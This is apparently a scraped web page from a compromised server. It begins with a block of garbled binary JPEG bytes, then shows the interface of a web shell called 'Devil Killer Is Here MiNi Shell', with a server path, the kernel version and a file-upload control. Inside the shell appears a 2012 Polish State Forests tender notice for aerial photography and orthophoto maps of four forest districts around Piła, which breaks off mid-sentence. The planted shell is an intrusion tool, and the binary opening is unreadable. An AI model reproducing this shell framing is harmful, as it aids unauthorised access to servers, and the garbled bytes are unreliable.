JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120710/244316-N-2012.html

<p class="kh_header"><b>Piła: Opracowanie ortofotomap dla obszaru terytorialnego zasięgu nadleśnictw:Człopa, Mirosławiec, Tuczno i Wałcz</b><br>
<b>Numer ogłoszenia: 244316 - 2012; data zamieszczenia: 10.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe- Regionalna Dyrekcja Lasów Państwowych w Pile , ul. Kalina 10, 64-920 Piła, woj. wielkopolskie, tel. 067 2124844 w. 32, faks 067 2126478.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka państwowa nie posiadjąca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie ortofotomap dla obszaru terytorialnego zasięgu nadleśnictw:Człopa, Mirosławiec, Tuczno i Wałcz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest - Wykonanie zdjęć lotniczych oraz opracowanie na ich podstawie ortofotomap dla czterech nadleśnictw: Człopa. Mirosławiec, Tuczno i Wałcz wg aktualnych danych pozyskanych z nalotu fotogrametrycznego wykonanego w okresie od 06.08.2012 do 05.09.2012 r.
- Nadleśnictwo Człopa pow. ogólna 19 283 ha, pow. zasięgu terytorialnego 27 009 ha - 270,09 km2. 
- Nadleśnictwo Mirosławiec pow. ogólna 15 035 ha, pow. zasięgu terytorialnego 27 204 ha - 272,04 km2.
 - Nadleśnictwo Tuczno pow. ogólna 23 018 ha, pow. zasięgu terytorialnego 40 320 ha - 403,20 km2. 
- Nadleśnictwo Wałcz pow. ogólna 17 153 ha, pow. zasięgu terytorialnego 33 677 ha - 336,77 km2. Stan wg 01.01.2012 r.
2	Warunki techniczne:
2.1	zdjęcia należy wykonać dla całego zasięgu terytorialnego Nadleśnictwa Człopa (ok. 27 009 ha), Nadleśnictwa Mirosławiec (ok. 27 204 ha), Nadleśnictwa Tuczno (ok. 40 320 ha), Nadleśnictwa Wałcz (ok. 33 677 ha), powiększonych o pas szerokości 200 m,
2.2	zdjęcia należy wykonać z odpowiednim pokryciem (pokrycie podłużne 60 %, pokrycie poprzeczne 30%),
2.3	wielkość piksela: nie więcej niż 25 cm,
2.4	dopuszczalny średni błąd kwadratowy (RMSE) położenia punktów kontrolnych 1m, 
2.5	rozdzielczość spektralna w zakresie 4 kanałów RGB (R - czerwony, G - zielony B - niebieski oraz CIR - bliskiej podczerwieni),
2.6	układ odniesienia: PUWG 1992,
2.7	wymagania dotyczące wykonania nalotu fotogrametrycznego:
o	maksymalne wychylenie układu optycznego od nadiru podczas rejestracji ? do 3°,
o	termin nalotu - od 06 sierpnia - do 05 września 2012 r,
o	kąt padania promieni słonecznych >30°,
o	bezchmurna pogoda,
2.8	ortofotomapy należy dostarczyć w kroju arkuszy map topograficznych 1:5 000 wraz z indeksem arkuszy,
2.9	Ortofotomapy muszą być ciągłe powierzchniowo, jednolite geometrycznie 
i radiometrycznie (zmozaikowane):
o	brak znaczących różnic tonalnych pomiędzy arkuszami ortofotomapy 
w granicach ciągłego opracowania,
o	brak różnic tonalnych i geometrycznych na granicy arkuszy ortofotomapy wchodzących w skład ciągłego obszaru opracowania,
o	brak błędów mozaikowania w postaci zniekształceń obiektów 
na ortoobrazie,
o	linie mozaikowania powinny być poprowadzone w miarę możliwości 
po naturalnych granicach celem zminimalizowania wpływu różnic tonalnych w obrębie pojedynczych działek.
3	Produkty dla Zamawiającego (dla każdego nadleśnictwa):
3.1	ortofotomapa RGB - format GeoTIFF z kompresją JPEG w stopniu kompresji q=4,
3.2	ortofotomapa CIR - format GeoTIFF z kompresją JPEG w stopniu kompresji q=4,
3.3	zdjęcia cyfrowe w barwach rzeczywistych (RGB)1 - format TIFF z kompresją JPEG stopniu kompresji q=4 wraz z plikami aerotriangulacji w formacie intergraph ISAT,
3.4	zdjęcia cyfrowe barwne w podczerwieni (CIR) 1 - format TIFF z kompresją JPEG i stopniu kompresji q=4 wraz z plikami aerotriangulacji w formacie intergraph ISAT,
3.5	ortoobrazy 4 kanałowe - format GeoTIFF bez kompresji,
3.6	DTM (NMT) - format ESRI GRID, format w jakim zostały pozyskane,
3.7	linie mozaikowania ortoobrazów do ortofotomapy (linie zszycia łączenia kolejnych zdjęć nalotu - format SHP,
3.8	sprawozdanie techniczne wykonania prac wg wzoru - załącznik nr 3 do umowy,
3.9	trzy oddzielne zestawy dokumentacji teledetekcyjnej dla każdego nadleśnictwa (łącznie 4 x 3) - przeznaczone po jednym dla Nadleśnictwa, RDLP i Wykonawcy PUL, dostarczone na osobnych nośnikach cyfrowych (dla każdego zestawu) w postaci dysków zewnętrznych HDD 2,5, zasilane przez interfejs - USB 2.0, pojemność nie mniejszej niż 500 GB.
4	Wymagania dodatkowe
4.1	Na Wykonawcy ciążą obowiązki wynikające z prawa geodezyjnego  
i kartograficznego, względem Państwowego Zasobu Geodezyjnego 
i Kartograficznego,
4.2	Niezbędne do wykonania przedmiotu umowy materiały i sprzęt zostaną zabezpieczone przez Wykonawcę,
4.3	Wykonawca zobowiązuje się do wykonania przedmiotu zlecenia określonego 
w pkt. 1 z należytą starannością, zgodnie z zasadami obowiązującymi przy wykonywaniu tego rodzaju prac oraz zgodnie z obowiązującymi przepisami prawa..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.41.00-5, 71.35.42.00-6, 22.11.43.00-5, 71.55.11.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca jest zobowiązany do wniesienia wadium w wysokości:
 - 3 400,00 PLN (słownie złotych: trzy tysiące czterysta złotych);
2.	Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących formach, w zależności od wyboru Wykonawcy:
2.1	pieniądzu, 
2.2	poręczeniach bankowych;
2.3	poręczeniach pieniężnych spółdzielczych kas oszczędnościowo-kredytowych;
2.4	gwarancjach bankowych;
2.5	gwarancjach ubezpieczeniowych;
2.6	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
(Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
3.	Wadium wnoszone w formie innej niż pieniężna należy w oryginale dołączyć do oferty. W treści dokumentu musi znajdować się nieodwołalne i bezwarunkowe zobowiązanie wypłaty na rzecz Zamawiającego kwoty wadium we wszystkich przypadkach powodujących utratę wadium przez Wykonawcę, określonych w art. 46 ust. 4a i 5 ustawy Pzp. Wadium  musi  obejmować cały okres związania ofertą. 
4.	Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na rachunek bankowy: w Banku PKO BP o/Piła nr 95 1020 3844 0000 1102 0006 7538; z dopiskiem -Wadium w przetargu na Wykonanie ortofotomap. Wadium musi wpłynąć na wskazany wyżej rachunek Zamawiającego przed upływem terminu składania ofert.
5.	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 46 ust. 1-4 ustawy Pzp.
6.	Zgodnie z art. 46 ust. 4a i 5 ustawy Pzp Zamawiający zatrzyma wadium wraz z odsetkami, w przypadku gdy:
6.1	Wykonawca, którego oferta zostanie wybrana:
6.1.1	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
6.1.2	nie wniesie wymaganego zabezpieczenia należytego wykonania umowy,
6.1.3	zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy;
6.2	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym względzie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykonać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał co najmniej 1 (jedną) usługę w zakresie obejmującym przedmiot zamówienia  o powierzchni minimum 130 000 ha (1 300 km2); - wg wzoru stanowiącego załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym względzie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykonać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym względzie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykonać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym względzie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykonać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wraz z ofertą Wykonawca zobowiązany jest złożyć oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Pzp - wg wzoru stanowiącego Załącznik nr 3 do SIWZ.
2.	Jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym lub zdolnościach finansowych, osobach zdolnych do wykonania zamówienia innych podmiotów (niezależnie od charakteru prawnego łączących go z nimi stosunków), zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
3.	Jeżeli Wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia. Wykonawca w odniesieniu do tych podmiotów zobowiązany jest także złożyć dokumenty wymienione w pkt 4.
4.	W celu potwierdzenia, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 ustawy Pzp Wykonawca zobowiązany jest złożyć:
4.1	oświadczenie o braku podstaw do wykluczenia z postępowania - wg wzoru stanowiącego odpowiednio Załącznik nr 4a do SIWZ;
4.2	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy Pzp, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy Pzp, tj. zgodnie z Załącznikiem nr 4b do SIWZ;
4.3	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
4.4	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
5.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, odpowiednio że:
nie otwarto jego likwidacji ani nie ogłoszono upadłości,
nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
6.	Dokumenty, o których mowa w niniejszym rozdziale składane są w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę, lub jego pełnomocników. Oświadczenie o spełnianiu warunków udziału w postępowaniu wymienione w rozdziale IX SIWZ pkt 1 i pkt 5 ppkt. 5.1. oraz zobowiązania opisane w rozdział IX SIWZ pkt 3 winno zostać złożone w formie oryginału.
7.	W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty należy dołączyć pełnomocnictwo, z którego wynika zakres pełnomocnictwa. Pełnomocnictwo winno być podpisane przez osoby uprawnione do reprezentowania Wykonawcy. W przypadku załączenia kserokopii pełnomocnictwa, winno ono być potwierdzone za zgodność z oryginałem przez notariusza.
8.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w rozdziale IX SIWZ pkt 3, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez Wykonawcę lub te podmioty.
9.	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
10.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający ma na uwadze postanowienia art. 144 ust. 1 ustawy Pzp, dopuszcza możliwość zmian zawartej umowy w szczególności, w następujących okolicznościach:
-terminów wykonania przedmiotu Umowy wraz ze skutkami wprowadzenia takiej zmiany, przy czym zmiana spowodowana może być jedynie okolicznościami leżącymi wyłącznie po stronie Zamawiającego lub okolicznościami niezależnymi zarówno od Zamawiającego jak i od Wykonawcy tj. wystąpienie siły wyższej, której wystąpienie ma wpływ na realizację Umowy lub wystąpienie okoliczności zaistniałych w trakcie realizacji przedmiotu Umowy utrudniających lub uniemożliwiających terminowe wykonanie przedmiotu Umowy. Termin -siła wyższa- oznacza akty terroru, wojny wypowiedziane i niewypowiedziane, blokady, powstania, zamieszki, epidemie, osunięcia gruntu, trzęsienia ziemi, powodzie, wybuchy i inne podobne nieprzewidywalne zdarzenia poza kontrolą którejkolwiek ze Stron i którym żadna ze Stron nie mogła zapobiec.
- regulacji prawnych, wprowadzonych w życie po dacie podpisania Umowy, wywołujących potrzebę zmiany Umowy, wraz ze skutkami wprowadzenia takiej zmiany,
- oznaczenia danych dotyczących Zamawiającego i-lub Wykonawcy,
- rozbieżnościami lub niejasnościami w rozumieniu pojęć użytych w Umowie, których nie można było usunąć w inny sposób a zmiana taka będzie umożliwiać usunięcie rozbieżności i doprecyzowanie Umowy w celu jednoznacznej interpretacji</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_pila/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalna Dyrekcja Lasów Państwowych w Pile 
ul. Kalina 10, 64-920 Piła
fax. 67-212-48-78
rdlp@pila.lasy.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.07.2012 godzina 11:00, miejsce: Regionalna Dyrekcja Lasów Państwowych w Pile 
ul. Kalina 10, 64-920 Piła.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> OFERTA SKŁADANA PRZEZ WYKONAWCÓW WSPÓLNIE UBIEGAJĄCYCH SIĘ O UDZIELENIE ZAMÓWIENIA 1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania w postępowaniu, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty w oryginale. W przypadku załączenia kserokopii pełnomocnictwa, winno ono być potwierdzone za zgodność z oryginałem przez notariusza.2.	W przypadku wyboru przez Zamawiającego oferty złożonej przez wykonawców wspólnie ubiegający się o udzielenie zamówienia, Wykonawcy zobowiązani będą, najpóźniej przed podpisaniem umowy na wykonanie zamówienia, do przedłożenia umowy regulującej ich współpracę. 3.	Oferta wykonawców wspólnie ubiegający się o 